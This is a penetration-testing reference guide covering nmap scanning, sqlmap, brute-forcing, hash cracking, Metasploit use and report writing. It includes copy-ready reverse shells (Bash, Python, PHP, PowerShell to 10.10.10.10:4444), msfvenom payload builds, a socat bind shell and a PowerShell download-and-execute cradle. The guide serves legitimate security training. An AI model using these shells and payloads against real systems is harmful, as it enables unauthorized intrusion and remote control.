A comprehensive guide to penetration testing tools, methodologies, and practical security testing approaches.
- Testing Methodologies
- Network Tools
- Web Application Tools
- System Tools
- Password & Credential Tools
- Post-Exploitation Frameworks
- Penetration Testing Workflow
- Report Writing Guidelines
- Quick Reference & Cheat Sheets
Testing Methodologies
Industry Standards
- PTES (Penetration Testing Execution Standard) - Comprehensive testing framework
- OWASP Testing Guide v4 - Web application security testing
- NIST SP 800-115 - Technical guide to information security testing
Testing Phases
- Planning - Gather customer goals and rules of engagement
- Discovery - Scanning and enumeration to identify vulnerabilities
- Attack - Confirm vulnerabilities through exploitation
- Reporting - Document findings, exploits, and recommendations
Network Tools
Network Discovery & Scanning
Nmap - Network Mapper
Primary network discovery and port scanning tool.
Host Discovery:
# ARP discovery (same subnet)
sudo nmap -PR -sn 192.168.1.0/24
# ICMP discovery variations
sudo nmap -PE -sn 10.10.68.220/24 # Echo request
sudo nmap -PP -sn 10.10.68.220/24 # Timestamp
sudo nmap -PM -sn 10.10.68.220/24 # Address mask
# TCP/UDP discovery
sudo nmap -PS -sn 10.10.68.220/24 # TCP SYN ping
sudo nmap -PA -sn 10.10.68.220/24 # TCP ACK ping
sudo nmap -PU -sn 10.10.68.220/24 # UDP pingPort Scanning:
# Comprehensive scans
nmap -sS -sV -sC -O -A --version-all -Pn target.com
nmap -p- --min-rate=1000 -T4 target.com
nmap -sU --top-ports 1000 target.com
# Stealth scanning
nmap -sS -f -T2 -D RND:10 --source-port 53 target.com
# Service detection with NSE
nmap --script vuln,safe,discovery,version target.comAdvanced Scanning Techniques:
# Null scan
sudo nmap -sN target.com
# FIN scan
sudo nmap -sF target.com
# Xmas scan
sudo nmap -sX target.com
# ACK scan (firewall detection)
sudo nmap -sA target.com
# Window scan
sudo nmap -sW target.comMasscan
High-speed port scanner for large networks.
masscan -p1-65535 192.168.1.0/24 --rate=10000 --open-onlyOther Network Tools
- ARP-scan - Layer 2 discovery tool
- Netdiscover - Active/passive ARP reconnaissance
- Zmap - Internet-wide network scanner
Traffic Analysis
Wireshark
GUI-based network protocol analyzer for deep packet inspection.
tcpdump
Command-line packet analyzer.
tcpdump -i eth0 -w capture.pcap
tcpdump -r capture.pcap 'tcp port 80'Network Utilities
Netcat - Network Swiss Army Knife
# Listen on port
nc -lvnp 4444
# Connect to port
nc target.com 4444
# Transfer file
nc -lvnp 4444 > file.txt # Receiver
nc target.com 4444 < file.txt # SenderSocat - Advanced Network Relay
More advanced than netcat with encryption and forwarding capabilities.
# Simple TCP relay
socat TCP-LISTEN:8080,fork TCP:target.com:80
# Encrypted bind shell
socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0,fork EXEC:/bin/bashWeb Application Tools
Primary Testing Suites
Burp Suite
Comprehensive web application security testing platform.
Key Features:
- Proxy - Intercept and modify HTTP/HTTPS traffic
- Target - Site map and content discovery
- Repeater - Manual request manipulation
- Intruder - Automated attacks (bruteforce, fuzzing)
- Scanner - Automated vulnerability detection
- Decoder - Encode/decode data
- Comparer - Compare responses
Common Use Cases:
- SQL injection testing
- XSS payload testing
- Authentication bypass
- Session management testing
- CSRF token analysis
OWASP ZAP
Free alternative to Burp Suite with similar capabilities.
Specialized Web Tools
SQLMap
Automated SQL injection detection and exploitation.
# Basic scan
sqlmap -u "http://target.com/page.php?id=1"
# Post request
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test"
# Database enumeration
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables
sqlmap -u "http://target.com/page.php?id=1" -D dbname -T users --dumpDirectory & Content Discovery
Gobuster
Fast directory/file brute forcer.
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt,js,bakffuf - Fast Web Fuzzer
# Directory fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://target.com/FUZZ -mc 200,204,301,302,307,401,403
# Virtual host discovery
ffuf -w subdomains.txt -u http://target.com -H "Host: FUZZ.target.com"
# Parameter fuzzing
ffuf -w params.txt -u http://target.com/page?FUZZ=test -mc 200Dirb/Dirsearch
Alternative directory enumeration tools.
Web Vulnerability Scanners
Nikto
Web server vulnerability scanner.
nikto -h target.com -C allWPScan
WordPress vulnerability scanner.
wpscan --url http://target.com --enumerate u,p,t,ttSystem Tools
Windows Enumeration & Exploitation
winPEAS
Windows privilege escalation awesome script.
winpeas.exe > output.txtPowerUp.ps1
PowerShell script for common Windows privilege escalation vectors.
# Bypass execution policy
powershell.exe -nop -exec bypass
# Import and run
Import-Module .\PowerUp.ps1
Invoke-AllChecksWindows Manual Enumeration
# User enumeration
whoami /priv
net users
net user username
qwinsta
net localgroup
# System information
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Search for passwords
findstr /si password *.txt *.xml *.ini
# Check patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Network connections
netstat -ano
# Scheduled tasks
schtasks /query /fo LIST /v
# Services
wmic service list brief
sc qc servicenameLinux Enumeration & Exploitation
LinPEAS
Linux privilege escalation awesome script.
./linpeas.sh > output.txtLinEnum
Basic Linux enumeration script.
pspy
Monitor Linux processes without root permissions.
Linux Manual Enumeration
# System information
uname -a
cat /etc/os-release
# User information
id
whoami
groups
# Find SUID binaries
find / -perm -4000 2>/dev/null
# World-writable directories
find / -type d -perm -222 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron*
# Network connections
netstat -tulpn
ss -tulpnPassword & Credential Tools
Password Cracking
John the Ripper
CPU-based password cracker.
# Basic usage
john hashfile.txt
# With wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
# Show cracked passwords
john --show hashfile.txt
# Crack specific format
john --format=raw-md5 hashfile.txtHashcat
GPU-accelerated password cracker.
# MD5 hashes
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# NTLM hashes
hashcat -m 1000 -a 0 hash.txt wordlist.txt
# WPA2 handshake
hashcat -m 22000 hash.hc22000 wordlist.txtNetwork Authentication Attacks
Hydra
Network authentication brute forcer.
# SSH brute force
hydra -L users.txt -P passwords.txt ssh://target.com
# HTTP POST form
hydra -l admin -P passwords.txt target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
# FTP
hydra -L users.txt -P passwords.txt ftp://target.comWordlist Generation
Crunch
Pattern-based wordlist generator.
# Generate 4-character passwords with lowercase letters
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
# With pattern
crunch 8 8 -t pass -o wordlist.txtCUPP - Common User Passwords Profiler
Generate wordlists based on target information.
python3 cupp.py -i # Interactive modeCeWL
Generate wordlists from websites.
cewl -d 2 -m 5 -w wordlist.txt http://target.comPost-Exploitation Frameworks
Metasploit Framework
Basic Usage
# Start Metasploit
msfconsole
# Search for exploits
search apache
# Use exploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec
# Set options
show options
set RHOSTS target.com
set LHOST 10.10.10.10
# Run exploit
exploitMeterpreter Commands
# System information
sysinfo
getuid
ps
# File operations
ls
download file.txt
upload payload.exe
# Privilege escalation
getsystem
use priv
# Post modules
run post/windows/gather/hashdumpMsfvenom - Payload Generator
# List payloads
msfvenom --list payloads
# Windows reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf > shell.elf
# PHP web shell
msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=4444 -f raw > shell.phpPenetration Testing Workflow
1. Reconnaissance & Information Gathering
# Passive recon
- OSINT gathering
- Subdomain enumeration
- Certificate transparency logs
- Google dorking
# Active recon
- DNS enumeration
- Port scanning
- Service enumeration2. Vulnerability Assessment
# Automated scanning
- Vulnerability scanners (Nessus, OpenVAS)
- Web application scanners
- Network vulnerability detection
# Manual testing
- Service-specific testing
- Business logic flaws
- Authentication bypass attempts3. Exploitation
# Initial access
- Known vulnerabilities
- Password attacks
- Client-side attacks
- Social engineering
# Privilege escalation
- Local exploits
- Misconfigurations
- Credential reuse4. Post-Exploitation
# Persistence
- Backdoors
- Scheduled tasks
- Service installation
# Lateral movement
- Network enumeration
- Credential harvesting
- Pivoting techniques
# Data exfiltration
- Identify sensitive data
- Package and compress
- Covert channelsReport Writing Guidelines
Report Structure
1. Executive Summary
- High-level overview of findings
- Business impact assessment
- Key recommendations
- Risk ratings summary
2. Technical Summary
- Vulnerability categories found
- Successful attack paths
- Failed attempts and limitations
- Testing methodology used
3. Detailed Findings
For each vulnerability:
- Title: Clear vulnerability name
- Severity: Critical/High/Medium/Low
- Description: Technical explanation
- Impact: Business impact
- Proof of Concept: Steps to reproduce
- Remediation: Specific fix recommendations
- References: CVEs, documentation
4. Appendices
- Tool outputs
- Screenshots
- Code snippets
- Raw data
Severity Ratings
- Critical: Complete system compromise, data breach
- High: Significant impact, partial compromise
- Medium: Limited impact, requires conditions
- Low: Minimal impact, informational
Best Practices
- Be factual and objective
- Include clear reproduction steps
- Provide actionable remediation
- Use screenshots and evidence
- Consider business context
- Follow responsible disclosure
Quick Reference & Cheat Sheets
Common Port Services
21 - FTP
22 - SSH
23 - Telnet
25 - SMTP
53 - DNS
80 - HTTP
110 - POP3
111 - RPCbind
139 - NetBIOS
143 - IMAP
161 - SNMP
443 - HTTPS
445 - SMB
1433 - MSSQL
1521 - Oracle
3306 - MySQL
3389 - RDP
5432 - PostgreSQL
5900 - VNC
5985 - WinRM HTTP
5986 - WinRM HTTPS
8080 - HTTP AlternateReverse Shell Commands
Bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'PHP
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"); ?>PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"File Transfer Methods
Python HTTP Server
# Python 2
python -m SimpleHTTPServer 8000
# Python 3
python3 -m http.server 8000SMB Server (Impacket)
impacket-smbserver share . -smb2supportNetcat
# Receiver
nc -lvnp 4444 > file.txt
# Sender
nc target.com 4444 < file.txtPowerShell Download
# Download file
Invoke-WebRequest -Uri http://10.10.10.10/file.exe -OutFile file.exe
# Execute in memory
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/script.ps1')Useful Resources
This guide provides a foundation for security testing. Always ensure you have proper authorization before testing any systems. Stay updated with the latest tools and techniques as the security landscape evolves rapidly.